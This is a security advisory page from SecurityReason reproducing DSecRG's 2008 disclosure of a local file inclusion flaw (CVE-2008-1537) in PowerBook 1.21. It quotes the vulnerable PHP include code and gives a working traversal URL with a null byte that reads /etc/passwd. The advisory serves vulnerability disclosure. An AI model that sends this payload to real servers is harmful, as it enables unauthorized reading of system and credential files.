Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research

WLB

WLB Database

Send to WLB

About WLB

RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Corporate

Contact

About us

Services

SecurePHP

Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Details : SecurityAlert

  Topic : LFI in PowerBook 1.21
  SecurityAlert : 3783
  CVE : CVE-2008-1537
  SecurityRisk : Medium  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : Digital Security Research Group
  Published : 29.03.2008

  Affected Software : PowerBook 1.21



  Advisory Text :  

Hello, bugtraq.

[DSECRG-08-031] Digital Security Research Group [DSecRG] Advisory

Application: PowerBook
Versions Affected: 1.21
Vendor URL: http://www.powerscripts.org/
Bug: Local File Include
Exploits: YES
Reported: 01.02.2008
Vendor Response: none
Solution: none
Date of Public Advisory: ..2008
Author: Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)

Description
***********

Local File Include vulnerability found in script
pb_inc/admincenter/index.php

Non-authentication user can directly access to this script.

To exploit this vulnerability REGISTER_GLOBALS option must be ON in php
config file.

Code
****
#################################################

if (!$page) {
$page = "home";
}

$page .= ".inc.php";

if(file_exists($page) == false) {
echo "
<div align="center">Sorry, the page <b>$page</b> does not
exist!</div>
";
} else {
include("$page");
}

#################################################

Example:

http://[server]/[installdir]/pb_inc/admincenter/index.php?page=../../../

../../../../../../../../../../etc/passwd%00

About
*****

Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services,
risk analysis and ISMS-related services and certification for ISO/IEC
27001:2005 and PCI DSS standards. Digital Security Research Group
focuses on web application and database security problems with
vulnerability reports, advisories and whitepapers posted regularly on
our website.

Contact: research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)

--
Alexandr Polyakov
DIGITAL SECURITY RESEARCH GROUP

mailto:research (at) dsec (dot) ru [email concealed]





  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

*BSD libc (strfmon) Multiple vulnerabilities

high- 2008-03-25

Maksymilian Arciemowicz discovered a Integer Overflow vulnerability in the libc library "strfmon()" function.A vulnerability could allow an attacker who successfully exploits this vulnerability to take control of the affected *BSD systems.

Apache rss

» Apache-SSL memory
   disclosure

» Apache mod_negotiation
   Xss and Http Response
   Splitting

» Apache (mod_status)
   Refresh Header - Open
   Redirector (XSS)

» Apache (mod_proxy_ftp)
   Undefined Charset UTF-7
   XSS Vulnerability

PHP rss

» PHP 5.2.6 chdir(),ftok()
   (standard ext) safe_mode
   bypass

» PHP 5.2.6 posix_access()
   (posix ext) safe_mode
   bypass

» PHP 5.2.5 and prior :
   *printf() functions
   Integer Overflow

» PHP 5.2.5 cURL safe_mode
   bypass

Copyright © SecurityReason. All Rights Reserved.